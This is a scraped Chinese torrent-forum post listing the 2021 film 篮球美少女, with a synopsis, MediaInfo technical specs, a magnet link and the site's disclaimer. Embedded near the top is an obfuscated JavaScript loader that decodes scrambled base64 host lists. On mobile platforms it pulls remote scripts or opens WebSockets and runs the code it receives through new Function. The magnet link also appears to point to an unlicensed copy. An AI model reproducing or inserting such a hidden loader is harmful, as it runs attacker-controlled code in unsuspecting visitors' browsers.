篮球美少女[国语配音/中文字幕].Lan.Qiu.Mei.Shao.Nv.2021.WEB-DL.1080p.H264.AAC 1.12GB

版主小s 23天前 352

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 篮球美少女
◎年  代 2021
◎产  地 中国大陆
◎上映日期 2021-07-06(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35516253/

◎标  签 青春 / 校园 / 篮球 / 爱情 / 中国大陆 / 2021 / 电影 / 喜剧

◎简  介
  校园青春喜剧《篮球美少女》的创意来源,取自于中国古代的《花木兰从军记》。同样的女扮男装的情景假设在文明进步的现代,让美少女如男人一样打扮,模仿男人的谈吐举止,把嗓音压低压粗,必不可少的束胸、上厕所、洗澡,以及其他啼笑皆非的道具,使人兴致盎然.。影片中三角恋的情感迷局,外加女扮男装的身份闹剧,使女扮男装这种不可能的任务变成可能。都说武侠片是男人的成人童话,那么此片也可算是青少年的美丽童话。

  1. ##### MediaInfo ######
  2. General
  3. Complete name                            : 篮球美少女[email protected].mp4
  4. Format                                   : MPEG-4
  5. Format profile                           : Base Media
  6. Codec ID                                 : isom (isom/iso2/avc1/mp41)
  7. File size                                : 1.12 GiB
  8. Duration                                 : 1 h 18 min
  9. Overall bit rate                         : 2 032 kb/s
  10. Writing application                      : Lavf58.29.100
  11. Video
  12. ID                                       : 1
  13. Format                                   : AVC
  14. Format/Info                              : Advanced Video Codec
  15. Format profile                           : [email protected]
  16. Format settings                          : CABAC / 4 Ref Frames
  17. Format settings, CABAC                   : Yes
  18. Format settings, Reference frames        : 4 frames
  19. Codec ID                                 : avc1
  20. Codec ID/Info                            : Advanced Video Coding
  21. Duration                                 : 1 h 18 min
  22. Bit rate                                 : 1 931 kb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 820 pixels
  25. Display aspect ratio                     : 2.35:1
  26. Frame rate mode                          : Variable
  27. Frame rate                               : 24.000 FPS
  28. Minimum frame rate                       : 23.994 FPS
  29. Maximum frame rate                       : 24.006 FPS
  30. Color space                              : YUV
  31. Chroma subsampling                       : 4:2:0
  32. Bit depth                                : 8 bits
  33. Scan type                                : Progressive
  34. Bits/(Pixel*Frame)                       : 0.051
  35. Stream size                              : 1.06 GiB (95%)
  36. Writing library                          : ptw-1.0.133 rcm-adapt vs-93 vwk
  37. Color range                              : Limited
  38. Color primaries                          : BT.709
  39. Transfer characteristics                 : BT.709
  40. Matrix coefficients                      : BT.709
  41. Codec configuration box                  : avcC
  42. Audio
  43. ID                                       : 2
  44. Format                                   : AAC LC
  45. Format/Info                              : Advanced Audio Codec Low Complexity
  46. Codec ID                                 : mp4a-40-2
  47. Duration                                 : 1 h 18 min
  48. Bit rate mode                            : Constant
  49. Bit rate                                 : 93.4 kb/s
  50. Channel(s)                               : 2 channels
  51. Channel layout                           : L R
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 46.875 FPS (1024 SPF)
  54. Compression mode                         : Lossy
  55. Stream size                              : 52.5 MiB (5%)
  56. Default                                  : Yes
  57. Alternate group                          : 1


TAGS 剧情 喜剧 运动

磁力链:
  • magnet:?xt=urn:btih:C3012AE32F9D71836ECDAEC857FE74F884BEB5BC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回